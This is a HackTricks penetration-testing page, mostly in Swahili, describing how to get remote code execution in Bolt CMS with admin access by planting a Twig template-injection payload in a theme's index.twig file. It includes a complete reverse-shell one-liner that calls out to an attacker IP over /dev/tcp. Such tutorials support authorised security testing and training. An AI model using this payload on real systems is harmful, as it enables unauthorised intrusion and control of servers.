hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

Bolt CMS

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

RCE

Baada ya kuingia kama admin (nenda kwenye /bot kupata kiashiria cha kuingia), unaweza kupata RCE katika Bolt CMS:

• Chagua Configuration -> View Configuration -> Main Configuration au nenda kwenye njia ya URL /bolt/file-edit/config?file=/bolt/config.yaml
• Angalia thamani ya mandhari

• Chagua File management -> View & edit templates
• Chagua mandhari msingi iliyopatikana katika hatua ya awali (base-2021 katika kesi hii) na uchague index.twig
• Katika kesi yangu hii iko kwenye njia ya URL /bolt/file-edit/themes?file=/base-2021/index.twig
• Weka payload yako katika faili hii kupitia template injection (Twig), kama: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• Na uhifadhi mabadiliko

• Futa cache katika Maintenance -> Clear the cache
• Fikia tena ukurasa kama mtumiaji wa kawaida, na payload inapaswa kutekelezwa

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}